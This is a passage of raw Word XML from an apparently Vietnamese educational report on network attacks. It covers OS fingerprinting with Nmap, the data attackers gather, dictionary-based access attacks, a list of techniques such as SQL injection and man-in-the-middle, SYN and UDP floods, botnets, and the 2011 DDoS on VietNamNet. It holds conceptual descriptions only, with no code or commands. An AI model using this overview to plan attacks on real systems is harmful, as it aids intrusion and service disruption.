          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49630B42" wp14:editId="77B3AE20">
            <wp:extent cx="44958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1676400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B60078E" w14:textId="77777777" w:rsidR="0069098A" w:rsidRPr="0069098A" w:rsidRDefault="0069098A" w:rsidP="0069098A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFA7075" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRPr="0069098A" w:rsidRDefault="000E08FA" w:rsidP="000E08FA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069098A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Xác định hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB911BF" w14:textId="153E38C8" w:rsidR="000E08FA"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Biết được hệ điều hành nào đang cài đặt trên máy đích, hacker có thể liệt kê ra được danh sách các lổ hổng và điểm yếu có thể thâm nhập vào đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A474D" w14:textId="77777777" w:rsidR="002F0A7D" w:rsidRDefault="002F0A7D" w:rsidP="000E08FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F15191D" w14:textId="66810A63" w:rsidR="002F0A7D"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Do việc cài đặt bộ giao thức TCP/IP trên từng loại hệ điều hành là khác nhau nên hiện nay hacker dựa vào đó để xác định loại hệ điều hành trên máy tính đích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498D71C" w14:textId="483462FF" w:rsidR="002F0A7D"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7F786129" w14:textId="7169AEEC" w:rsidR="002F0A7D" w:rsidRDefault="002F0A7D" w:rsidP="000E08FA">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Các công cụ có thể dò tìm hệ điều hành là: Nmap, Queso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40022852" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRPr="00C73388" w:rsidRDefault="000E08FA" w:rsidP="00372720">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E167FFE" w14:textId="6833BC93" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="002F0A7D" w:rsidP="00372720">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w:t>
      </w:r>
      <w:r w:rsidR="00372720" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.4.2.1.3. Các thông tin cần ghi nhận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003903AD"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Địa chỉ IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264EB381"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ác dịch vụ mạng đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3449236C"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ổng của các ứng dụng nào đang mở</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E0BA00"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Hệ điều hành đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4C950C" w14:textId="77777777" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="00372720" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Phiên bản Web server nào…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FEE1B9" w14:textId="77777777" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="00372720" w:rsidP="00372720">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5D26537E" w14:textId="23D631F7" w:rsidR="00372720" w:rsidRPr="00C73388"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4.2.2. Tấn công truy cập (Access attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225DE816" w14:textId="6B478D0C" w:rsidR="00372720" w:rsidRPr="00C73388"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4.2.2.1. Khái niệm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D4945" w14:textId="77777777" w:rsidR="00372720"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ấn công truy cập là loại tấn công chiếm lấy tài nguyên trên hệ thống như file, mật khẩu, quyền điều khiển, thường khai thác các lỗ hổng của hệ thống nạn nhân. Các lỗ hổng này thường là: lỗ hổng trong các dịch vụ xác thực, dịch vụ FTP, dịch vụ web. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A504D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Sau khi đã thử mật khẩu bằng từ điển, tin tặc sẽ dễ dàng truy cập vào các tài khoản của admin như trong cơ sở dữ liệu, website, ứng dụng, phần mềm quản lý…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3810952A" w14:textId="77777777" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="00372720">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p>
    <w:p w14:paraId="6F372F77" w14:textId="77777777" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="00372720" w:rsidP="0037272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Sau khi khai thác lỗ hổng, kẻ tấn công sẽ có quyền truy cập vào tài khoản web, database và các dữ liệu nhạy cảm khác. Kiểu tấn công này thường rất đa dạng về hình thức nhưng có điểm chung là kẻ tấn công thường dùng từ điển để đoán mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EB064B" w14:textId="232BD683" w:rsidR="002F0A7D" w:rsidRDefault="002F0A7D" w:rsidP="001C5905">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D11D07" w14:textId="1732F736" w:rsidR="002F0A7D" w:rsidRDefault="002F0A7D" w:rsidP="001C5905">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2.2. Các kỹ thuật thông dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA7D39" w14:textId="77777777" w:rsidR="002F0A7D" w:rsidRDefault="002F0A7D" w:rsidP="001C5905">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19427DB4" w14:textId="4736A966"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nghe lén</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A99ACB" w14:textId="68B1B670"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nghe lén trong môi trường switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A505135" w14:textId="44A41E3D"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tấn công sử dụng lại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027FC33" w14:textId="5612D7A7"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cướp giao dịch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45324EAE" w14:textId="454EA3FA"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kẻ đứng giữa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201E23CC" w14:textId="1F692FB7"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cửa hậu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D95959" w14:textId="6A7D764B"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đánh lừa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404AA995" w14:textId="5C943341"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lừa đảo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EA4336" w14:textId="4A591969"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giả dạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2238B747" w14:textId="7DAC2E1F"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khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B97A161" w14:textId="669260CC"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tràn bộ đệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A0FF4" w14:textId="0A4B8484" w:rsidR="002F0A7D" w:rsidRPr="008C67B2"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quét lén mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2217EF" w14:textId="2E77974F" w:rsidR="002F0A7D" w:rsidRDefault="002F0A7D" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C67B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Kỹ thuật tấn công SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA461A9" w14:textId="77777777" w:rsidR="008C67B2" w:rsidRDefault="008C67B2" w:rsidP="008C67B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD6B232" w14:textId="1597A08A" w:rsidR="008C67B2" w:rsidRDefault="008C67B2" w:rsidP="008C67B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w:t>
      </w:r>
      <w:r w:rsidR="00642DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>3. Tấn công từ chối dịch vụ (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093276F" w14:textId="26FF5D49" w:rsidR="006F01AE" w:rsidRDefault="006F01AE" w:rsidP="008C67B2">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3.1. Khái niệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA32640" w14:textId="44AEF654" w:rsidR="006F01AE" w:rsidRDefault="00292C2B" w:rsidP="00292C2B">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sidRPr="00292C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Một cuộc tấn công từ chối dịch vụ (tấn công DoS - viết tắt của Denial of Service) hay tấn công từ chối dịch vụ phân tán (tấn công DDoS - viết tắt của Distributed Denial of Service) là một nỗ lực làm cho những người dùng không thể sử dụng tài nguyên của một máy tính. Mặc dù phương tiện để tiến hành, động cơ, mục tiêu của tấn công từ chối dịch vụ có thể khác nhau, nhưng nói chung nó gồm có sự phối hợp, sự cố gắng ác ý của một người hay nhiều người để một trang, hay hệ thống mạng không thể sử dụng, làm gián đoạn, hoặc làm cho hệ thống đó chậm đi một cách đáng kể với người dùng bình thường, bằng cách làm quá tải tài nguyên của hệ thống. Thủ phạm tấn công từ chối dịch vụ thường nhắm vào các trang mạng hay server tiêu biểu như ngân hàng, cổng thanh toán thẻ tín dụng và thậm chí DNS root servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072CC34E" w14:textId="77777777" w:rsidR="00292C2B" w:rsidRDefault="00292C2B" w:rsidP="00292C2B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4D4DC4" w14:textId="17F42DA3" w:rsidR="00292C2B" w:rsidRDefault="00292C2B" w:rsidP="00292C2B">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I.4.2.3.2. Các kỹ thuật thông dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E921C18" w14:textId="2E8B6082" w:rsidR="00AA5A5F" w:rsidRDefault="00AA5A5F" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>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Kỹ thuật làm lụt bằng SYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876CC71" w14:textId="77777777" w:rsidR="0023777F" w:rsidRDefault="00AA5A5F" w:rsidP="00AA5A5F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>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Khi Server nhận 1 yêu cầu kết nối SYN, nó sẽ trả lời bằng SYN/ACK và dành ra 1 khoảng tài nguyên (bộ nhớ, CPU) để phục vụ cho kết nối đó và chờ tín hiệu xác nhận lại từ Client). Nếu nhận được </w:t>
      </w:r>
      <w:r w:rsidR="0023777F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>số kết nối vô cùng lớn, Server sẽ bị cạn kiệt tài nguyên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34021FC9" w14:textId="208DCCFD" w:rsidR="00AA5A5F" w:rsidRPr="00AA5A5F" w:rsidRDefault="00AA5A5F" w:rsidP="00AA5A5F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>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D87EC78" w14:textId="3B9A1A41" w:rsidR="00AA5A5F" w:rsidRDefault="00AA5A5F" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:num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Kỹ thuật làm lụt UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFDD9C0" w14:textId="5A5F523C" w:rsidR="0023777F" w:rsidRDefault="0023777F" w:rsidP="00F07DA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>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Làm lụt bằng UDP: Hacker gửi gói tin UDP echo với địa chỉ IP nguồn là cổng loopback của chính mục tiêu cần tấn công hoặc của một máy tính trong cùng mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA893A" w14:textId="77777777" w:rsidR="0023777F" w:rsidRDefault="0023777F" w:rsidP="00F07DA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E2A250" w14:textId="225B30A8" w:rsidR="0023777F" w:rsidRDefault="0023777F" w:rsidP="00F07DA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Làm lụt bằng cách dịch vụ mạng khác: Làm quá tải Web Server bằng nhiều kết nối với cùng 1 URL, gửi nhiều email đến 1 tài khoản mail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F52A0E" w14:textId="77777777" w:rsidR="0023777F" w:rsidRPr="0023777F" w:rsidRDefault="0023777F" w:rsidP="0023777F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="720" w:right="-52" w:hanging="153"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EE0B67" w14:textId="26C0FC35" w:rsidR="00AA5A5F" w:rsidRPr="00F07DA3" w:rsidRDefault="00AA5A5F" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="567" w:right="-52" w:hanging="207"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07DA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Kỹ thuật tấn công DoS phân tán (DDoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54983766" w14:textId="55B9D7C6" w:rsidR="00AA5A5F" w:rsidRDefault="00F07DA3" w:rsidP="00F07DA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="0" w:right="-52" w:firstLine="556"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Kẻ tấn công sử dụng nhiều máy tính (đã chiềm quyền điều khiển) cùng 1 lú tấn công vào 1 máy tinh khác. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597B4A0" w14:textId="77777777" w:rsidR="00F07DA3" w:rsidRDefault="00F07DA3" w:rsidP="00F07DA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="0" w:right="-52" w:firstLine="556"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F934F8" w14:textId="4CD5C3BD" w:rsidR="00F07DA3" w:rsidRDefault="00F07DA3" w:rsidP="00F07DA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="0" w:right="-52" w:firstLine="556"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Các máy tính bị khống chế để phục vụ tấn công DdoS gọi là botnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBEEBC" w14:textId="3FC3128F" w:rsidR="00470997" w:rsidRPr="00C73388" w:rsidRDefault="00470997" w:rsidP="00F07DA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1B13BC" w14:textId="79ABF4F1" w:rsidR="001C5905" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A" w:rsidP="0023777F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:hanging="153"/>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1C5905" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DB52FA" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Sự kiện bảo mật năm 2011</w:t>
      </w:r>
      <w:r w:rsidR="00000165" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> và các cuộc tấn công lớn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21030A6A" w14:textId="4BCF4DCC" w:rsidR="00CD1997" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A" w:rsidP="0023777F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:hanging="153"/>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CD1997" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.1. VietNamNet bị tấn công DDoS lớn chưa từng có .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFAB6BB" w14:textId="77777777" w:rsidR="00CD1997" w:rsidRPr="00C73388" w:rsidRDefault="00CD1997" w:rsidP="0023777F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:hanging="153"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AECCBF" w14:textId="16775B7C" w:rsidR="00CD1997" w:rsidRPr="00C73388" w:rsidRDefault="00CD1997" w:rsidP="0023777F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52" w:hanging="153"/>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F07DA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong vài ngày qua, báo VietNamNet đã phải hứng chịu một cuộc tấn công từ  chối dịch vụ phân tán (DDoS) ở quy mô lớn chưa từng có tại Việt Nam, xuất phát từ một mạng lưới khổng lồ gồm hàng chục ngàn máy tính bị nhiễm vi  rút. Bắt đầu từ cuối ngày 4/1/2011, lưu lượng truy cập vào trang chủ báo  VietNamNet tại địa chỉ http://vietnamnet.vn tăng nhanh một cách bất thường, lên tới  hàng trăm ngàn kết nối tại một thời điểm. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71982A54"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3CF1759B"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Với lượng độc giả truy cập hàng ngày, số lượng kết nối tại một thời điểm chỉ ở </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01736930" w14:textId="6C29C2C0"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mức dưới một trăm ngàn. Nên việc tại một thời điểm có tới hàng trăm ngàn kết nối liên tục (bao gồm cả của các độc giả thông thường) tới máy chủ web đã khiến băng thông đường truyền mạng bị quá tải. Do vậy, độc giả truy cập vào báo VietNamNet sẽ bị tắc nghẽn ngay từ đường truyền và báo lỗi không tìm thấy máy chủ, phải truy cập vài lần mới mở được trang web. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19213371"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4396F9BB"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Trên thực tế, báo VietNamNet đã từng bị tấn công DDoS nhiều lần nhưng ở quy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06401E4F" w14:textId="0AC83248"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mô vài chục ngàn kết nối tại một thời điểm nên băng thông hệ thống và công suất các máy chủ vẫn có thể chịu đựng được. Trong cuộc tấn công DDoS đang diễn ra, kẻ thủ ác đã thể hiện khả năng rất chuyên nghiệp khi huy động một mạng lưới botnet với lượng máy lên tới hàng chục ngàn máy tính. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3DB485"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64D775DE" w14:textId="6F30BE8F" w:rsidR="00CD1997"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CD1997" w:rsidRPr="00C73388">
        <w:rPr>
